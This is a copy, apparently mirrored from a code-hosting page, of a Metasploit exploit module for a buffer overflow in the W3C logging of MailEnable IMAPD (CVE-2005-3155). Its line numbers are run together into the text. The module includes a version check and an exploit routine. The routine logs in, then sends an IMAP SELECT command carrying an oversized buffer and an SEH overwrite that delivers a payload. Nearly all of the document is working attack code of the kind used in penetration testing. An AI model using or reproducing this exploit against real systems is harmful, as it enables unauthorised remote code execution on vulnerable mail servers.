Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/imap/mailenable_w3c_select.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Imap9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',14'Description' => %q{15This module exploits a buffer overflow in the W3C logging16functionality of the MailEnable IMAPD service. Logging is17not enabled by default and this exploit requires a valid18username and password to exploit the flaw. MailEnable19Professional version 1.6 and prior and MailEnable Enterprise20version 1.1 and prior are affected.21},22'Author' => [ 'MC' ],23'License' => MSF_LICENSE,24'References' =>25[26[ 'CVE', '2005-3155'],27[ 'OSVDB', '19842'],28[ 'BID', '15006'],29],30'Privileged' => true,31'DefaultOptions' =>32{33'EXITFUNC' => 'thread',34},35'Payload' =>36{37'Space' => 600,38'BadChars' => "\x00\x0a\x0d\x20",39'StackAdjustment' => -3500,40},41'Platform' => 'win',42'Targets' =>43[44['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL45],46'DisclosureDate' => '2005-10-03',47'DefaultTarget' => 0))48end4950def check51connect52disconnect5354if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/)55return Exploit::CheckCode::Appears56end57return Exploit::CheckCode::Safe58end5960def exploit61connect_login6263buf = rand_text_alphanumeric(6196, payload_badchars)64seh = generate_seh_payload(target.ret)65req = 'a01 SELECT ' + buf + seh + "\r\n"66sock.put(req)6768handler69disconnect70end71end727374